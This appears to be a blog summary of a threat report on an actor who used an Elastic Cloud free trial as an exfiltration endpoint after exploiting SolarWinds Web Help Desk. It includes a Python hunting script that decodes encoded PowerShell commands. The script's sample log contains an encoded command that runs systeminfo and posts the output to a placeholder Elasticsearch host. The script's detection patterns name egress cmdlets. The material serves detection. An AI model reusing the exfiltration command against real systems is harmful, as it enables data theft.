Threat Intel - Actor Exploits Elastic Cloud Free Trial
Basically, a hacker used a free trial of a security tool to steal data from multiple organizations.
A threat actor abused Elastic Cloud's free trial as an exfiltration endpoint, affecting multiple organizations. The incident underscores how a legitimate, trusted cloud service can be turned into attacker infrastructure. Immediate action is being taken to address the vulnerabilities.
The Threat
A recent investigation by Huntress has unveiled a threat actor exploiting vulnerabilities in SolarWinds Web Help Desk. This actor has been using a free trial of Elastic Cloud SIEM to exfiltrate victim data. By leveraging legitimate infrastructure, they managed to gather sensitive information from various organizations, revealing the extent of their campaign.
The actor executed an encoded PowerShell command to extract detailed system information from compromised machines. This data was then sent to an attacker-controlled Elasticsearch index hosted on the trial deployment. The use of Elastic Cloud for such malicious activity is alarming, as it shows how attackers can abuse legitimate services, whose traffic blends in with normal business use, for nefarious purposes.
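The encoded-PowerShell-to-Elasticsearch pattern described above is something a SOC can hunt for in process-creation telemetry rather than only at the network edge. The following is an added Python example and not Huntress's tooling or anything taken from the report: it parses constructed process-creation log lines, decodes any -EncodedCommand argument, and scores the decoded script on the combination of host-recon cmdlets and an Elasticsearch-shaped outbound destination. The log format, hostnames, indicator lists and the Elastic Cloud hostname pattern are all assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Added example, not Huntress's code: detection logic for encoded PowerShell
# launches whose decoded script inventories the host and ships the result to an
# Elasticsearch-style endpoint. Log format and indicator lists are assumptions.

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
# so the parameter name is validated in code instead of being hard-coded here.
ENC_PARAM = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators are checked against the *decoded* script, never the raw command line.
RECON_PATTERNS = [r"\bsysteminfo\b", r"Get-ComputerInfo", r"Get-(?:Wmi|Cim)"]
EGRESS_PATTERNS = [r"Invoke-RestMethod", r"Invoke-WebRequest", r"Net\.WebClient"]
# Elastic Cloud style hostname (assumed shape), index document/bulk API paths, default ports.
ES_PATTERNS = [r"\.es\.[\w-]+\.(?:aws|gcp|azure)\.", r"/_doc\b", r"/_bulk\b", r":9200\b", r":9243\b"]

# Assumed log shape: timestamp, host, user and the quoted process command line.
LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmdline="(?P<cmdline>.*)"$')


@dataclass
class Finding:
    host: str
    cmdline: str
    decoded: Optional[str]
    indicators: list = field(default_factory=list)
    severity: str = "none"


def find_encoded_blob(cmdline: str) -> Optional[str]:
    """Return the base64 argument of a -EncodedCommand (or prefix) parameter, if any."""
    for m in ENC_PARAM.finditer(cmdline):
        name, blob = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(name):
            return blob
        # -ExecutionPolicy and friends also start with 'e' but carry no payload.
    return None


def decode_blob(blob: str) -> Optional[str]:
    """PowerShell encodes the script as UTF-16LE before base64; undo both, None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(decoded: str):
    """Map the indicator groups found in a decoded script to a triage severity."""
    hits = []
    for label, patterns in (("recon", RECON_PATTERNS), ("egress", EGRESS_PATTERNS), ("elasticsearch", ES_PATTERNS)):
        if any(re.search(p, decoded, re.IGNORECASE) for p in patterns):
            hits.append(label)
    if "recon" in hits and ("egress" in hits or "elasticsearch" in hits):
        return hits, "high"      # host inventory plus a channel to ship it out
    if hits:
        return hits, "medium"
    return hits, "low"           # encoded launch with no known indicator: still worth logging


def analyze_line(line: str) -> Optional[Finding]:
    m = LINE_RE.match(line)
    if not m or "powershell" not in m.group("cmdline").lower():
        return None
    host, cmdline = m.group("host"), m.group("cmdline")
    blob = find_encoded_blob(cmdline)
    if blob is None:
        return Finding(host, cmdline, None, [], "none")
    decoded = decode_blob(blob)
    if decoded is None:
        # An encoded argument that will not decode is itself suspicious (obfuscation or corruption).
        return Finding(host, cmdline, None, ["undecodable-encodedcommand"], "medium")
    hits, severity = classify(decoded)
    return Finding(host, cmdline, decoded, hits, severity)


def scan(lines):
    """Return findings for every PowerShell launch that used an encoded command."""
    return [f for f in map(analyze_line, lines) if f is not None and f.severity != "none"]


def _encode(script: str) -> str:
    # Builds the constructed fixtures below in the layout powershell.exe expects.
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample log lines (not from the report). The first mimics the described
# pattern with a deliberately non-functional command and a placeholder hostname.
SAMPLE_LOGS = [
    '2024-08-21T14:02:11Z host=SRV-WHD01 user=NT_AUTHORITY\\SYSTEM cmdline="powershell.exe -nop -w hidden -enc '
    + _encode("systeminfo; Invoke-RestMethod -Uri https://PLACEHOLDER.es.us-east-1.aws.elastic-cloud.com/hosts/_doc -Method Post") + '"',
    '2024-08-21T14:05:40Z host=WS-1042 user=CORP\\jdoe cmdline="powershell.exe -enc ' + _encode("Get-Date") + '"',
    '2024-08-21T14:06:02Z host=SRV-FS02 user=CORP\\svc_backup cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
    '2024-08-21T14:07:15Z host=WS-1043 user=CORP\\asmith cmdline="notepad.exe C:\\Users\\asmith\\notes.txt"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.severity:6} {f.host:10} {f.indicators}")
```

Scoring on the decoded script rather than the raw command line matters because the indicators (systeminfo, Invoke-RestMethod, the Elasticsearch path) never appear in plain text in the process-creation event; a rule that only matches on -enc will page on every legitimate admin script, while one that also demands a recon-plus-egress combination in the decoded body isolates the behaviour this campaign used.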
Who's Behind It
The investigation indicates that the adversary registered their Elastic Cloud trial using a disposable email from a temporary email service. This tactic is common among cybercriminals to maintain anonymity. The actor's infrastructure also included connections to a SAFING_VPN, which further complicates tracking their activities.
Interestingly, the threat actor's operations were not isolated. They appeared to have connections to other opportunistic attacks against software like Microsoft SharePoint, indicating a broader strategy targeting multiple vulnerabilities across various platforms. The use of disposable emails and VPNs suggests a well-planned approach to evade detection.
Tactics & Techniques
During their campaign, the threat actor demonstrated considerable activity within the Elastic Cloud instance. They performed extensive data triage, logging numerous interactions over several days. This included targeted searches for high-value assets such as domain controllers and servers, indicating a focus on critical infrastructure.
The analysis revealed that the compromised data came from approximately 216 unique victim hosts, predominantly servers running Windows Server. The affected organizations spanned multiple sectors, including government, education, and finance, highlighting the widespread impact of this threat.
Defensive Measures
In response to this exploitation, Huntress has coordinated with Elastic and law enforcement to mitigate the threat. They have taken steps to notify affected organizations and investigate the breach further. For organizations, it is crucial to monitor for any unusual activity and ensure that security measures are in place to protect against similar attacks.
To safeguard against such threats, consider implementing the following measures:
- Regularly update and patch software to close vulnerabilities.
- Monitor network traffic for unusual patterns that may indicate data exfiltration.
- Educate employees about the risks of phishing and the importance of using secure, verified email services.
By staying vigilant and proactive, organizations can better defend against the tactics employed by threat actors like the one exploiting Elastic Cloud's free trial.
Huntress Blog